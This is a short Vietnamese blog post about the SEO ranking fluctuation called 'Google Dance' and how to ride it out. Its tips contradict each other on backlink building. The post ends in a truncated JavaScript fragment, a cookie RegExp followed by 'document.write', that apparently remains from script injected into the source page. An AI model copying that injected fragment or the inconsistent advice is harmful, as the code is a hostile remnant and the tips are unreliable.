Google Dance

Google Dance: Dance là nhảy. Google Dance là hiện tượng kết quả trên Google của bạn nhảy loạn lên, lúc trang 1, lúc trang 3,4, lúc lại bay khỏi top 100.

Định nghĩa Google Dance

Như phần trên, Google Dance chính là hiện tượng bị nhảy kết quả khi bạn làm SEO. Google Dance thường xảy ra với những website mới mà đã làm SEO, hoặc với những website cũ mới làm SEO.

Google Dance không có gì là ghê gớm, nhưng nếu không biết cách, trang web của bạn có thể dính một hiện tượng nguy hiểm hơn, đó là Google Sandbox.

Làm thế nào để thoát khỏi Google Dance

Google Dance có thể là điềm báo tin tốt, cũng có thể là điềm báo tin xấu cho website của bạn. Nếu bạn mới làm Seo, kết quả chưa cao mà từ khóa bị nhảy thường là báo hiệu của việc sắp lên TOP. Nếu bạn đã lên TOP và từ khóa bị nhảy, bạn phải cẩn thận vì có thể bay khỏi top 100 bất cứ lúc nào.

Để thoát khỏi Google Dance, bạn đừng hoảng loạn, hãy giữ nguyên các công việc đang làm hàng ngày. Quan trọng nhất trong giai đoạn này là bạn phải làm đều, ví dụ 1 bài mới/ ngày, 100 backlink/ ngày! Vì sao? Google Dance là tín hiệu báo có sự bất thường trong website của bạn, nếu bạn làm đều thì Google sẽ thấy website này ổn định => đưa từ khóa về vị trí ổn định.

Lưu ý 1: có thể tăng nội dung (chưa xuất hiện trên Google lần nào càng tốt) để đẩy nhanh quá trình thoát khỏi Google Dance.

Lưu ý 2: tuyệt đối không được tăng làm Backlinks. Backlinks đang là một vấn đề nóng của dân SEO, nếu bạn chưa Pro về xây backlink thì giải pháp tốt nhất là giảm làm Backlink cho an toàn.

Lưu ý 3: tuân thủ điều quan trọng nhất, và lưu ý 1, 2 nếu không muốn bị đưa vào Google Sand Box. Lúc đó thì vui!

(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘